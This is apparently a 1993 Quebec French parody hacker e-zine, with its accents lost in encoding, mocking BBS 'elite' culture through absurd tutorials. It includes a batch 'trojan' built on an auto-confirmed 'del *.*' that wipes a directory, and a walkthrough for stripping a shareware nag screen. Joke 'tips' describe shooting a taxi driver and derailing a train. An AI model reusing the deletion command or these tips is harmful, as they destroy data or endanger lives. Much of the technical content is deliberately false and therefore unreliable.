est srs qu'ils sont bons vu qu'on les prend dans des revues amricaines pis qu'on les traduit aprs. | | | Je me cale, tu me cales, on me cale, vous me calez, je change de handle. COMMENT CHANGER DE HANDLE un autre article intelligent de votre tinami DENTAL FLUSH C'est quand votre rputation est terre qu'il est temps de changer de handle pour se refaire une autre vie. Maintenant, o trouver le handle convenant votre personnalit? L est la question. La meilleure place, c'est dans l'univers ambiant. Les noms de l'espace, style Capitaine Picouille, sont passs date et dnotent une jeunesse accrue et un penchant pour Star Trek. Evitez aussi de prendre votre handle dans un groupe de musique, parce que si jamais vous voulez embarquer dans NpShit, va falloir que je change mon avis sur ce genre de handle. Ce que je suggre, c'est de pogner votre handle dans la circulaire Provigros et d'ajouter un mot style-hot dedans: Liste de mots style-hot Killer Destroy Blood Suffocation Ugly Fire Incinerator Mad Cutter Snoopy A prsent, explorons les combinaisons possibles. Avec le mot KLEENEX (qui est justement en spcial cette semaine) on peut former le handle "Kleenex of Suffocation". Un handle de ce style-l dnote une personne sre d'elle mettons, avec eee... beaucoup d'argent, et un gros rhube probablement. D'autres exemples de combinaisons fuckes avec leur signi- fication en franais pour vous aider: Ugly Sausage Saucisse Dgueulasse Chocolate Incinerator Incinrateur de Chocolat Fire Rice Riz de Feu Mad Oil Huile Mchante Blood Sauce Sauce de Sang Oats Cutter Coupeur de Gruau Killer Apple Pomme Tueuse (Orange Mcanique Part II) Microwave Snoopy Snoopy Micro-Ondable Vous voyez comment c'est facile d'avoir l'air hot mes yeux! Il se peut que vous vous fassiez rire de vous par certains users de boards publix, mais vous savez trs bien qu'il est impossible qu'un user de board publix ait raison sur quelque sujet que ce soit. Plus loin dans ce magazine il y aura un autre article de moi. Il est vident que vous allez le lire. Aprs tout, c'est un article de moi. | | | SHiT DrUGz ToDAY: lA PLaSTiCiNe! par Coaxial Karpette! Bon, coeurs sensibles abstenez-vous ou bouchez-vous les yeux, cette droye est trs nocive, dangereuse et prise dans la revue U.S.Drugs. Cette droye est faite de PLASTIC!! a destroy donc pas peu prs et mme un peu plus! On peut la fumer, la sniffer, la piquer, la bouffer, et la blaster (J'ai pris ce mot l dans la revue, mais je catch pas pantoute ce que a veut dire.) Tk, ses ingrdients sont trs faciles, pis je vais vous les crire tu-suite, le temps que je sorte mon dictionnaire. 1 morceau de plastique (Comme celui de votre camion Tonka par exemple, sur lequel vous pouvez faire un prlvement) 1 cuillerre table de cannabis (Vous trouverez a dans tous les bons Perrette!) 1 tasse de farine Robin Hood 1 seringue pleine d'eau comme celle que vous vous servez dans votre bain, mais avec une aiguille 2 couteaux (Je me demande ben pourquoi) 1 pole au propane (Probablement pour la faire cuire!) 1 sac de guimauves (C'est mon initiative: y est pas crit dans la revue, mais c'est bon au boutte!) 1 paquet de branches (pour les guimauves) Bon... Astheure que vous avez trouv tous ces ingrdients sans vous faire arrter ou interner, commenons le mlange. Faire cuire le morceau de plastique au four 350 degrs farenheit jusqu' bullition. Saupoudrer de cannabis et de farine. Tamiser. Pour 3 5 personnes. PS: Si vous faites un bad trip, faites une plainte Air-Drug. (Ceux qui font la pub "Vous allez voler comme vous n'avez jamais vol, et on va vous voler comme vous vous aurez jamais fait voler.") | | | Le Mot du mdium par le mdium (je vois pas qui part a!) Les rencontres du 1er type, c'est de voir une soucoupe volante. Le 2eme type, c'est quand elle atterrit. Le 3eme type c'est quand des extra-terrestres en sortent. Mais saviez-vous qu'une rencontre du 4eme type survient quand un extra-terrestre devient collaborateur pour NPShit? | | | LA CHRONIQUE MENSUELLE SUR LA PROGRAMMATION By Peanut Butter Comme vous le savez srement (on s'en vante tellement!), nous, les OFFICIERS de la MACHINE NPShit, sommes les meilleurs en absolument tout, surtout en programmation. Nous avons dcid, nous les DIEUX de l'INFORMATIQUE, de vous faire profiter de notre immense rserve de connaissances en programmation en vous montrant quelques algorithmes demandant un effort crbral particulirement intense pour tre bien assimils. P.S. Si vous lisez cette rubrique, envoyez-nous 30$ parce que les listings sont copyright. P.S. Si vous ne comprenez pas les listings, envoyez-nous 30$, nous vous enverrons la T-phile anglaise originale. P.S. Si vous comprenez les listings envoyez-nous 30$ et appelez-nous pour nous les expliquer. P.S. Dans tout autre cas, envoyez-nous 30$ pareil. LECON #1: Assignation d'une valeur une variable en BASIC. Listing 1: 10 A=7 A premire vue, cela semble trs complexe..... Mais ne vous en faites pas, les officiers de NPShit avec leur cerveau suprieur ont compris ce listing (aprs de nombreuses heures de dur labeur). 10 signifie le numro de la ligne, A est la variable, 7 est la valeur. Le plus compliqu rside dans l'usage du '=', plusieurs personnes font l'erreur d'crire 10=A 7 (cela m'arrive trs souvent), une erreur aussi frquente est d'crire 10=A=7 (cela m'arrive encore plus souvent). Bref, l'assignation d'une variable en BASIC est trs complique pour des dbutants comme vous (c'est pas comme nous) donc, si vous avez des assignations faire, envoyez-nous vos variables, vos valeur et nous vous renverrons le listing moyennant une contribution de 30$. LECON #2 Programmation en Assembleur pour programmeurs tres avancs (officiers NPShit). Listing 2: MOV AX,0 Cette instruction a pour but de mettre la valeur de AX dans la valeur 0. Comme le 0 est en fait gal a AX, cela bloque l'IRQ externe de la LED du PRINTSCREEN LOCK en maskant le chip secondaire de la master switch 6048 avec la valeur du dernier CLUSTER de l'EMS 2 watt interne au priphrique RESET multipli par le QI total du staff de NPShit. Comme vous voyez, nous maitrisons parfaitement l'Assembleur. Si dans un programme, vous avez besoin de l'instruction MOV, envoyez 30$ la machine NPShit, mais c'est pas sur que nous vous enverrons un listing. LECON #3 Programmation d'un SCROLL vertical de qualit professionnelle. Nous utiliserons pour faire ce scroll un langage tres performant (c'est pour ca que nous, la machine NPShit, utilisons seulement ce langage) THE............. BATCH FILE LANGUAGE Version 5.00 Pour commencer le programme, vous devez taper au prompt C:\>COPY CON SCROLL.NPS Voici le listing: @ECHO OFF ECHO. ECHO. ECHO NOUS ECHO. ECHO. ECHO SOMMES ECHO. ECHO. ECHO LES ECHO. ECHO. ECHO MEILLEURS ECHO. ECHO. ECHO (c)Caillou Chanceux ECHO. Pour le faire runner, vous devez taper: C:\>TYPE SCROLL.NPS Puis, quand le texte apparait, vous faites plusieurs fois cela va faire scroller le texte vers le haut (scroll interactif). Cette mthode de scroll interactif a t entirement dveloppe par les officiers de la machine NPShit. Personne n'avait jusqu'alors pens a faire un scroll aussi.......... gnial. Cette mthode permet l'utilisateur de faire scroller le texte la vitesse qu'il le veut selon sa rapidit user son piton . P.S. Avec un petit 30$, NPShit vous enverra 2 outils essentiels pour la programmation en BATCH FILE, soit: BCOMP.EXE pour compiler vos Batch files, ainsi que BLINK.EXE pour linker vos batch files. Pense du Jour #1 : Envoyez 30$ aux officiers de la machine NPShit Pense du Jour #2 : Criss que le monde est FISH...........NPShit FatFreePAL Peanut Butter | | | CHRONIQUE PROGRAMMATION AVANCEE COMMENT FAIRE UN DEMO par Bloody Steak Le langage qui offre les meilleures possibilits pour un Demo est sans aucun doute le GWBASIC. Ce langage (bien que trs complexe) possde plusieurs commandes des plus sophistiques (CIRCLE, LINE, BOX). N'est-ce pas merveilleux?! PS: Pour comprendre le reste de ce texte, nous vous conseillons de lire le texte sur l'assignation d'une variable en GWBASIC. Le reste du texte ne s'adresse qu' des personnes matrisant parfaitement le GWBASIC. 10 PRINT "MON PREMIER DEMO (GRACE A NPSHIT)" 20 SCREEN 0 ' (0 = QUOTIENT INTELLECTUEL DE FAIRY COMPST) ' Si un jour vous comprenez cette valeur, expliquez nous la. 30 LINE (0, 0) - (4000, -20), 69 ' Bon maintenant une vraie ligne complexe... ' le 0, 0 indique srement la couleur. ' le 4000 reprsente peut-tre la mmoire utilise?! ' Quant au -20 c'est la probabilit que cette ligne-l marche ' le 69 c'est la position des lignes. 40 CIRCLE (2000, 0), 682, 5150 ' Bon cette ligne-l je comprends rien pantoute fake laissez moi le temps ' d'inventer quekchose pour que j'aille l'air hot en programmation. ' Bon le 2000 c'est le nombre de membres sur Galactwit BBS (Notre Gros HQ). ' Le 0 c'est le nombre d'usagers brillants sur Galactwit. ' Le 682-5150 c'est justement le # de Galactwit; normalement les cercles ' devraient logiquement former les chiffres du numro du BBS. 50 END ' Maudite marde, encore un mot anglais, bon dans le dictionnaire y disent ' que a veut dire FAIM. Ah ben oui je check l'heure pis y'est 6:00pm, m'a ' aller souper. Cet exemple est vraiment des plus complexes, mais afin de vous aider, nous offrons pour une dure limite un cours d'introduction au GWBASIC au cot de -> 50$ <- la minute. A ce prix-l c'est une aubaine. Les seules personnes autorises de NPSHIT se rendre chez vous pour vous montrer le GWBASIC sont (Bloody Steak, Peanut Butter, BEEf BRoTH et Killer Ceiling Annihilator) | | | J'lite, je flash, j'allume, chu beau, chu intelligent, vous tes une gang de cons. QU'EST-CE QU'UN ELITE? By Dental Flush Vous connaissez dsormais ma vision du mot Mailer et du nom Dahlen. Mais la y'en a qui exagrent, nyah nyah chu plus lite que toi, moi je suis un vrai lite, vous-autres vous tes des immitations en in-tock, pis moi je fais partie d'un club d'lite ou bien moi je suis tireur d'lite. Mais NpShit est ici pour vous renseigner, pour justifier quelle est la vraie signification du mot lite. Les seuls qui peuvent se faire appeler lite, ce sont les membres de NpShit. Nous sommes les seuls ayant les qualits ncessaires. Bref nous sommes les meilleurs. Et vous tes des nobodies. Le but c'est que vous devez nous respecter et nous vnrer. Dans le prochain numro de NpShit, je vous sortirai encore un texte stupide, ayant pas rapport, et dpourvu de toute vracit (comme mon habitude) mais qui devrait soulever les foules! | | | D o S H A C k S COMMENT HACKER UNE BATCH FILE par BEEf BRoTH Une batch file? Ca l'air compliqu pour rien, mais nous allons essayer de mettre un peu d'ordre dans vos ides. J'ai bien dit essayer parce que dans l'fond j'ai ben d'la misre traduire les textes anglais qu'on pogne aux Etats. Ok. Bon. Ok fait que d'abord vous devez savoir qu'une batch file ca peut tre excut. Pour cela, on doit d'abord obtenir le nom de la batch file et la taper. J'espre que vous savez faire a sinon cessez de lire notre magazine, on est ben trop intelligent pour vous. Une batch file, a s'excute ligne par ligne, en ordre. Si vous voulez voir le contenu d'une batch, vous avez la possibilit de voir ce qu'elle fait si vous l'excutez. Mais certains programmeurs expriments en batch file comme notre dieu de la batch (Loocif Hair) mettent des protections qui nous empchent de voir le contenu lorsqu'excute. Pour a on doit se munir de Batch Debugger++ 3.0. Mais si vous l'avez pas vous pouvez quand mme utiliser Edlin, qui joue un petit peu le rle de Debug. En fait Edlin est beaucoup plus puissant que Debug, c'est pourquoi nous allons travailler avec celui-ci. Justement, pour les amateurs d'environnement graphique, MicroSoft vient de sortir une version d'Edlin pour Windows 3.1. 1- D'abord vous trouvez une batch que vous dsirez hacker. 2- Ensuite, vous devez excuter Edlin, avec comme ligne de com- mande le nom de la batch. Exemple: C:\DOS>edlin telemate.bat 3- Une batch c'est un programme en langage cobol qui est comp- ress par PKLite en code C, mais comme si y'avait un inter- prteur de segment qui stackait les interruptions de la clock. Pour ca vous devez vous assurer que vous pointez sur le bon cylindre, parce que vous savez tous que si vous utilisez HIMEM.SYS, il est possible que le DOS rentre en conflit avec la carte de la souris au moment de passer la modification des adresses du speaker. (Un speaker c'est la puce qui sert changer l'errorlevel des pixels de votre clavier) Quoi qu'il en soit, vous devez maintenant lister la mmoire afin de voir les commandes qui vont s'excuter. La Syntaxe: End of input file *1l * c'est le prompt. '1' c'est l'adresse en mmoire, elle est compose comme ceci: (256 * le Segment) + l'Offset. Pis 'l' c'est pour lister partir de cette adresse. Vous aurez comme rsultat: 1:*@echo off 2: echo TMBoot v15.8 par Loocif Hair 3: echo (C) Copyright 1987,1988,1989,1990,1991,1992 4: echo Tous droits rservs 5: echo . 6: echo Veuillez enregistrer ce programme. 7: pause 8: c: 9: cd\telemate 10: tm %1 %2 %3 %4 %5 %6 %7 %8 %9 11: cd\ 4- Le but du hack, c'est de modifier la source pour faire chier l'auteur pis lui faire des menaces de sortir une version de sa batch plus rcente. Mais maintenant, grce NpShit vous pourrez faire chier tout le monde. Pour se faire, vous devez identifier les mots effacer ou changer. Mettons que vous voulez changer le nom de l'auteur par le vtre. Donc on change la ligne de l'adresse 2. L a devient comp- liqu. Vous signalez edlin l'adresse modifier. *2 * c'est le prompt. Faut tout le temps rpter. '2' c'est l'adresse. J'viens de le dire. Vous verrez alors: 2:*echo TMBoot v15.8 par Loocif Hair 2:*_ '_', c'est le curseur. 5- Vous devez retaper le texte crit en haut, ou tout simplement le modifier. Vous devez cependant tout prix rcrire la commande echo sinon il est dangereux que votre batch ne marche pas. Cette commande est trs complique, mais si nous avons la chance de tomber sur un texte amricain qui l'explique, nous ferons un numro spcial pour vous montrer ca. Supposons que j'cris: 2:*echo TMBoot v15.8 par Loocif Hair 2:*ecko tmboute v 17,9 fabriquer et distribuer par le beste cra queur du quebec: BEEf BRoTH 6- Vous retournerez au prompt *. Le but c'est d'enlever la petite pause pis la note qui dit d'en- registrer le programme. Pour ca vous devez toute retapper le programme. Une petite liste pour voir ou nous en sommes: *1l (vous vous souvenez que le 1 c'est l'adresse pis le l c'est la commande de liste) 1: @echo off 2:*ecko tmboute v 15,9 fabriquer et distribuer par le beste cra queur du quebec: BEEf BRoTH 3: echo (C) Copyright 1987,1988,1989,1990,1991,1992 4: echo Tous droits rservs 5: echo . 6: echo Veuillez enregistrer ce programme. 7: pause 8: c: 9: cd\telemate 10: tm %1 %2 %3 %4 %5 %6 %7 %8 %9 11: cd\ La note est la ligne 6. Nous retapperons le programme a partir de la ligne o nous pouvons retrouver 'c:'. Donc tapez 6 pour diter la ligne: *6 6:*echo Veuillez enregistrer ce programme. 6:*_ La vous dcalez le programme: 6:*echo Veuillez enregistrer ce programme. 6:*c: Vous rptez cette opration pour les lignes suivantes. *7 7:*pause 7:*sd/talemaite *8 8:*c: 8:*tm /1 $2 #4 ^7 (Coudonc c'est quoi a? a doit etre une commande pour cracker Telemate) Voyons. Aprs a donc quoi qui faut faire. En tout cas, tout a semble fonctionner merveille. Pour s'en assurer, listons. 1: @echo off 2:*ecko tmboute v 15,9 fabriquer et distribuer par le beste cra queur du quebec: BEEf BRoTH 3: echo (C) Copyright 1987,1988,1989,1990,1991,1992 4: echo Tous droits rservs 5: echo . 6: c: 7: sd/talemaite 8:*tm /1 $2 #4 ^7 9: cd\telemate 10: tm %1 %2 %3 %4 %5 %6 %7 %8 %9 11: cd\ 7- Le rsultat que vous attendiez tous, je suppose. Vous devez recompiler la source batch. Pour ca vous donnez le numro de la premire et de la dernire ligne que vous dsirez conserver avec la commande d. Nous n'avons plus besoin des lignes a partir de 9. Vous procdez de cette faon: *1,8d 8- Finalement, vous devez enregistrer vos modifications avec la commande q. Il vous demande une question que j'ai pas encore russi comprendre, mais j'ai su de source sre d'un colla- borateur mexicain que a voulait dire "Etes-vous sur?" fait que fions-nous lui. *q Abort edit (Y/N)? y 9- Vous tes maintenant prt tester votre oeuvre. Si jamais les modifications que vous avez faites ne semblent pas avoir t enregistres, je suppose que c'est normal parce que j'ai jamais russi tester la batch que je viens de faire. Nous autres on est ben bons pour crire des affaires qu'on sait mme pas si a marche. J'espre tout de mme que j'ai russi tendre le champs de vos connaissances. | | | COMMENT FOURRER UNE MACHINE A CENNES Comme vous le savez, il y a un truc trs SIMPLE et facile pour fourrer une machine 0.25$. Pour ce faire, vous devez tout d'abord prendre une "piasse" (voir billet en papier qui sert de monnaie d'change). Pour commencer, vous dchirez la piasse de bord en bord par le centre (Attention, cela doit tre fait en plein centre de la piasse, utilisez une rgle). Un coup que ceci est fait, vous devriez avoir maintenant 2 ti-bouttes de piasse. Ensuite vous virez un ct de bord (Peu importe lequel). Ensuite vous le recollez avec du "scotch tape". Aprs a vous virez la piasse (maintenant recolle) du ct de la reine (dans le cas d'un 2$). Vous devez utiliser un crayon Bic bleu pointe fine pour faire une tite moustache la reine (style Hitler). Ensuite, pliez la piasse en 2 dans le sens du long. Aprs coup, prenez un Exacto (faites attention pour ne pas vous couper, la gang de NPShit n'est pas responsable des accidents) et dcoupez soigneusement le petit 2 (dans le cas d'un 2$ bien sr) en haut gauche (Important, il ne faut pas dpasser). Ensuite prenez un lighter ou un briquet ( votre choix) et brlez le coin oppos (juste un ti-peu). Bon vous avez enfin fini le massacre. Essayez-le maintenant. Si ca marche pas, ben je suis dsol de vous apprendre que cette petite exprience vient de vous coter 2$ (toujours dans le cas d'un 2$). Si ca marche, c'est probablement que vous n'avez pas suivi les instructions la lettre, ou je ne comprends pas..... Je suis dsol..... Explosive Banana | | | Bon, pause pub! DENTAL FLUSH la sommit en matire de tout EST COMMANDIT PAR P R O V I G R O S Les articles de Dental Flush, les citrons de Provigros. | | | -=-= BATCH FILEZ AVANCEES =-=- Construire un trojan en batch files par Killer Ceiling Annihilator Tout le monde pense qu'il faut un diplme d'tudes primaires pour crire un trojan. Eh bien c'est faux: la preuve, j'en ai crit un. (Je l'ai aussi essay, et j'ai perdu mon rpertoire, alors il marche srement.) Premirement, utilisez la puissante commande COPY CON pour diter le trojan. Pour se faire, tapez COPY CON TROJAN.BAT. Tapez ensuite ceci: ecro Trojan (c)1993 by K.C.A ecro Un instant SVP, j'efface votre rpertoire ecro O>TROJAN.TMP del *.*NUL Tapez et pour finir. (C'est la partie complique.) Oups! Mon frre vient de m'avertir que je me suis tromp et qu'il faut crire ECHO plutt qu'ECRO. Retapez donc votre programme avec COPY CON: echo Trojan (c)1993 by K.C.A echo Un instant SVP, j'efface votre rpertoire echo O>TROJAN.TMP del *.*NUL Bon! Maintenant chargeons le programme. Tapez PROGRAMME. Comme vous le voyez, il crit "Nom de commande ou de fichier non valide" ou un message en anglais. Si c'est un message en anglais, NPShit pense vous! Retapez le programme avec "Y" au lieu de "O"! ecro Trojan (c)1993 by K.C.A ecro Un instant SVP, j'efface votre rpertoire ecro Y>TROJAN.TMP del *.*NUL Ah non, j'ai encore crit ECRO! echo Trojan (c)1993 by K.C.A echo Un instant SVP, j'efface votre rpertoire echo Y>TROJAN.TMP del *.*NUL Bon, enfin! A prsent, tapez TROJAN. Le programme de trojan devrait fonctionner. Et alors, par le fait mme, votre batch file s'auto-effacera puisqu'elle est dans le rpertoire qu'elle efface. C'est compliqu, mais c'est mon frre qui vient de me confirmer a. Alors retapez votre batch file. (a me tente pas de la retaper moi aussi, faque dbrouillez-vous.) Je vais vous expliquer, ligne par ligne, comment fonctionne le programme. echo Trojan (c)1993 by K.C.A Cette ligne me permet de garder des droits d'auteur sur mon programme. (K.C.A sont les initiales de mon handle Killer Ceiling Annihilator.) De cette faon je pourrais dcider que les utilisateurs du trojan me doivent des frais de disons 30$ pour l'enregistrer. echo Un instant SVP, j'efface votre rpertoire Il est important de toujours crire ce que la batch file fait, sinon, pendant les longs travaux, l'utilisateur pourrait croire que son ordinateur est plant, et il pourrait mme le rebooter, ce qui ne laisserait pas le temps la batch file d'effacer tout le rpertoire. echo O>TROJAN.TMP del *.*NUL Ces deux lignes prises dans un magazine sont trs simples, mais brivement, c'est que zro doit tre plus grand que le contenu de TROJAN.TMP, qui soit dit en passant, est un fichier. Le rsultat fait que ce qui est effac n'inclut pas TROJAN.TMP. On peut aussi voir le mot NUL la droite, qui dsigne l'utilisateur. Comme vous le voyez, crire un trojan est trs facile: a ne m'a pris que quelques heures le transcrire du magazine. Une chose, cependant, est importante lorsque vous utilisez COPY CON. Assurez-vous toujours que vous avez COPY CON.COM dans votre rpertoire DOS! Et pour terminer, pas un mot mais bien une PHRASE en anglais pour avoir l'air pro et intelligent: "Hasta la Vista baby!" Killer Ceiling Annihilator (handle (c)1993 by mon frre) | | | COMMENT GONFLER UN TEXTE POUR QUE L'ARCHIVE SOIT PLUS GROSSE by Explosive Banana Comme vous le savez, quand on fait la publicit d'un texte ou journal, c'est beaucoup plus attirant lorsqu'il possde 500k plutot que 120... Alors, il y a un petit truc que certains diteurs utilisent, on appelle a du gonflage de fichiers. Tout ce que vous avez faire, c'est de dire des niaiseries qui ne tiennent pas debout pendant le plus de temps que vous pouvez, bref, vous dites des choses qui ne tiennent pas debout, des choses qui font passer le temps au monde qui vous croient comme des fishs.. Bref, tout ce qui n'a pas d'allure, est bon tre dit... Cet exemple est pour un fichier texte, comme l'exemple d'un journal... Dans le cas d'un ANSI, ben vous pouvez mettre un paquet de caractres blancs, comme a, personne ne va s'en rendre compte, et encore une fois, vous pourrez traiter vos lecteurs de fishs... Je crois que continuer a donner des exemples, ne serait qu'une perte de temps pour moi, car vous avez surement ralis que c'est ce que je fais depuis un ti-boutte de temps. Bref, sans ce texte stupide, et sans aucune importance, notre journal aurait sans doute un ti-peu moins gros, donc un ti-peu moins attirant pour vous alors, je tiens vous prvenir, car beaucoup de monde font a... Donc, si notre prochain numro n'a que 100k, dites-vous que peut-tre qu'il sera intelligent, mais je ne vous promet rien, le but de NPShit tant principa- lement bas sur le stupide. NpShit a fourni un dmo, dans ce fichier (Trs beau dmo en passant, merci Jigsaw Destroyer) avec les sources en QuickBasic et en Pascal. On a pas eu le temps de le faire en batch, en C, en Assembleur parce que c'tait une perte de temps puisque personne aurait compris. Dans ce dmo, nous donnons un exemple de gonflage. Le fichier NPSDEMO.EXE est plein d'overlay. Un overlay, c'est quoi? heeeeee! C'est la traduction anglaise de remplissage je crois. Enfin tout a pour dire que NPSDEMO.EXE est plein de vide. Bonne journe | | | Chronique LES GRANDS HACKERS DE QUEBEC Aujourd'hui: Recontre avec YANKUL Propos recueillis par Gelatine Butcher Yankul, notre matre hacker, notre Dieu tous, et aussi le seul vouloir nous accorder une entrevue, est une personne qui a de grands idaux et un gros ordinateur. Il nous a racont sa petite histoire vcue qui est recopie ici tout--fait INTEGRALEMENT, car comme Yankul nous a chaleureusement fait remarquer, "Vous crivez des conneries pis je vous bute!" Yankul, toi! Y Vous savez, je suis presque n avec un clavier dans le front pis un set de slots dans le cul. L'ordinateur n'tait mme pas invent que je hackais des programmes! J'ai t le premier avoir le prog de BBS Forum, qui tait l'poque sur des cartes perfores. Les machines marchaient la manivelle. Y avait pas des bus internes, mais bien des calches! On se loggait sur les boards en 14,400 caractres l'heure. En fait, part mon board, il n'y avait que le Micro-Babillard Qubec. NPS Quel genre d'ordinateur aviez-vous, matre? Y J'avais un Amiga au dbut, mais j'ai fini par changer pour un Coco 10. NPS Comment a, Coco 10, vnrable supriorit? Y 10, c'est 2 en binaire. A l'poque, fallait tout entrer en binaire avec un interrupteur. Comme c'tait assez long, on avait mis un inactivity timeout de 2 heures. Une chance que nous tions deux soit moi et mon assistant Koolaid. NPS Quels ont t vos dbuts en hackage, Dieu absolu? Y Comme tout le monde, j'ai fait un Forum Hack. J'y ai aussi install les toutes premires doors comme Essaie Re et Cul Vdor (Fantasy Land n'a rien invent.) J'ai aussi t le premier beta tester de Grumaute Editorial. Mais pour le hackage, ben j'ai hack Essaie Re, Cul Vdor et Grumaute Editorial. NPS Et votre bab, splendide grandeur? C'tait difficile faire runner dans ce temps-l? Y Plutt, oui. Vu qu'il n'y avait pas de tlphone, on devait ploguer le modem sur des botes de conserves, comme dans Passe-Partout finalement. Et dj cette poque, la GRC tait toujours rendue chez nous parce que j'tais le seul board pirate Qubec. Mais je me suis jamais fait pogner! NPS Vous avez eu de la luck! Y Non, j'utilisais Before. NPS Finalement, avez-vous un mot de la fin pour nos lecteurs? Y Oui. Je trouve a poche que des petits twits se prennent pour des hackers professionnels. NPS Vous avez bien raison et je vais de ce pas me jeter dans la fosse de l'Oubli Eternel, suprmatie de l'importance. Y De rien. a fera 50$ pour la consultation. | | | +- | +-+ +-- | | N e w z ! +- | +-+ +-+ +-+ | +- | | --+ | | Ansi (c)Caillou Chanceux COULEUR! On a dernirement invent un jaune fluo tellement fluo qu'il fait du bruit. "Fwitt", a-t-il dclar hier en confrence de presse. Organic Terminology EXPLICATION DE LA VITESSE DES 586... Aprs une tude approfondie faite par l'quipe complte de NPShit, nous avons dcouvert que la vitesse des ordinateurs 586 tait relie au fait que le BUS avait t chang par des METROBUS... La compagnie IBM a fait savoir notre magazine que celle-ci attendait aprs le Ministre des trans- ports de Qubec pour qu'ils lui sortent une nouvelle patente pour pouvoir enfin sortir leur ordinateur 686-266 Mhz. Le Prsident de IBM dit que si la CTCUQ ne se grouille pas, peut-tre que ceux-ci se tourneront vers la compagnie Air-France, et peut-tre que nous aurons droit au...... CONCORDBUS mais cette decision ne sera sans doute prise avant la parution de notre prochain numero de NPShit..... Important savoir: On nous dit que le terme DX et SX tait d au fait que le BUS comportait un simple ou un double set de roues. Vous compren- drez que plus le BUS a de roues, plus il est rapide. Si vous tes devant un DX2, c'est donc dire qu'il a un turbo racteur? On l'sait pas mais on va vous inventer de quoi pour expliquer a dans la prochaine issue de NpShit! Explosive Banana NOUVEAU SYSTEME NUMERIQUE Un nouveau systme numrique a vu le jour! Aprs la base 8 (le systme octal) voici la base 69, le systme ANAL! Null Character | | | Assembly Cronik The INTERRUPT Z by Socks Yogurt Eater Yo man, programmer, ici in NPShit on a une great news! Aprs l'interrupt AH (which makes yer computer shouts) and the F-18 int (which makes yer comp crashes) here is: L'INTERRUPT Z. This interrupt a t foutu l (yo man) by a big computor constructor --EPSON. (Dont nous tairons le nom) What does it does? Trs simple et hyper-mega-k00l man, it does une auto- destruction total & complete of the ordinateur. To use it, quite facile. Do a fichier batch with this dedans: ECHO Demo of INTERRUPT Z (c)1993 Socks Yogurt Eater Inc. ECHO One moment, auto-destruction... INT Z Evidemment, I'm not this fish! J'ai pas runn le prog! But d'aprs LA revue o je l'ai copi, IT WORKS! So, if a commence teller des menteries, who do ya wanna believe, man? Socks Yogurt Eater | | | Les BOARDS PUBLIX Une plaie pour la socit par Fairy Compst Sur les public boards, y a encore des criss de LamerZ qui tranent. Euh... Kess tu dis Dental Flush? Pas de Z LamerZ? Ah? Pis je serais mieux de dire MORON. OK debord. Sur les public boards, y a encore des criss de morons qui tranent. Heureusement que moi et mes amis on a 22 ans et six pieds 10 pour leur faire peur. L'autre jour sur un board j'coeure un gars, pis je dcide d'envoyer chier la gang de Lee Moaloo. Pis l je vous mens pas, y a du MONDE qui m'ont REPLYE. L a m'a ben mis en maudit, kess tu veux que je leur dise! Fallait tout le temps que je call ma mre pour qu' l'crive mes textes ma place. Des fois l'tait pas l pis j'crivais n'importe quoi vu qu'ils avaient raison. NON MAIS A TU DE L'ALLURE? Du monde de LEE MOALOO qui se PERMETTENT d'avoir RAISON. J'ai manqu de les fesser, mais on sait jamais, vu que Vnus fait peut-tre 6 pieds 11 pis Cramix c'est pttre Arnold Schwarzannamachinchose qui rentre sous un faux pseudo... Hein? Quoi, Dental? Faut pas dire PSEUDO...? HANDLE? Ah? Euh, pis en passant tu le trouves-tu beau mon handle? Mmm... Oui hein? Ah, mon beau petit Dental Flush d'amour, viens ici que je t'embrasse. Toi tu sais parler aux gars. Fairy Gdge | | | T R U C S N P S H I T I E N S Comment voler un char Eeeeehhh... Maudite bonne question a. Beh, arrange-toi premirement pour avoir les CLEFS du char. Si t'as pas les clefs tu vas tre pogn pour casser la vitre, pis pour aller en Floride pour que a serve quelque chose. Pis pour dmarrer, behh euh.. Check les films, ils font un court-circuit dans le dmarreur, tk arrange-toi avec tes troubles. Mais oubliez pas qu'il vous faut un permis pour le conduire ce char-l, sinon vous pourriez vous faire arrter! Blackboard Warrior Comment prendre le taxi gratos C'est facile man! Tu call un taxi et tu tires dessus avec une 22! Pour te procurer une 22, vraiment facile, tu piques le gun de chasse a ton pre! Pis aprs, ben t'as un taxi pour toi tu-seul! Le pire, c'est que ce truc-l marche! a a t essay et russi par des jeunes de la poly de Loretteville! La seule affaire, ben SVP dites pas tout le monde que c'est vous qui avez tir dessus! The Serial Number Comment faire drailler un train Trouves-toi un de tes chums qui a un permis pis vole un gros truck (Voir le truc de comment voler un char, mais la place de prendre une 22 tu prends une 303 (Si tu sais pas o avoir ce gun, on peut faire un article sur comment hacker la base de Valcartier.)) Pis t'essayes de trouver une bonne chane, pis tu l'attaches sur ton truck pis sur la rail (dboate si possible, pis la chane, vous attachez un boute sur le truck et l'autre sur le rail, donc il est plus pratique d'avoir une chane deux bouts.) pis tu drailles (Tu startes le moteur du truck, tu te mets en 1er vitesse (vitesse avant svp!) pis tu pses sur le gaz.) Un coup la track draille, restez pas attendre la venue du prochain train assis sur des chaises de parterre en-dessous d'un parasol sur la bord de la track avec votre popcorn et votre jus d'orange, a pourrait avoir l'air louche pour les voisins. Flour Rider Comment sauver des 25 cents dans une cabine tlphonique a c'est innocent d'aplomb! Tu connais-tu a, l'appel frais virs? Ben, pendant que la petite madame l'autre bord te demande ton nom, tu dis ben vite "HeymamanchuauxGaleriesdelaCapitaleviensmechercherla- portedesjeux!" Pis l ta maman a rien qu' pas accepter les frais pis venir te chercher! Par contre, pour se logger sur un board, c'est plus difficile, parce que la tlphoniste ne supporte pas l'mulation ANSI. Blitzcrest Comment trouver des ANSiS pour son BBS Facile! Copiez sur les autres boards pis dites au monde que c'tait un concours! Il est recommand d'enregistrer son Copyright aprs! Notice: Si y a kekun qui vous chat parce qui s'est rendu compte que c'est pas vos ansis, ben dtournez la conversation en le flicitant pour son dernier programme (leech-leech-leech) (c)Caillou Chanceux Comment savoir l'heure quand vous avez pas votre montre Gang de niochons! Ouvrez votre ordi! Si y a une horloge interne c'est pas pour rien! the STaFF | | | Chronique "Exemples de programmes difficiles" par PCMagazine, en fait (comme tous les autres articles) Pour notre plus grand bnfice tous nous avons piqu dans des revues ces courts extraits de programmes qui parleront d'eux- mmes. Essayez-les pour vous aider commencer dans un ou l'autre de ces langages! (Comme nous ne comprenons rien ceux-ci (Sauf pour les batch) il n'y aura pas d'explications donnes.) - Batch file - SET LAME=NPSHIT :LOOP ECHO NPShit, the New generation of young twits IF (%LAME%)==(NPSHIT) GOTO LOOP - GW-BASIC - 10 MORON=1 20 PRINT"Hello, I'm Fairy Compst!":IF MORON=1 THEN 20 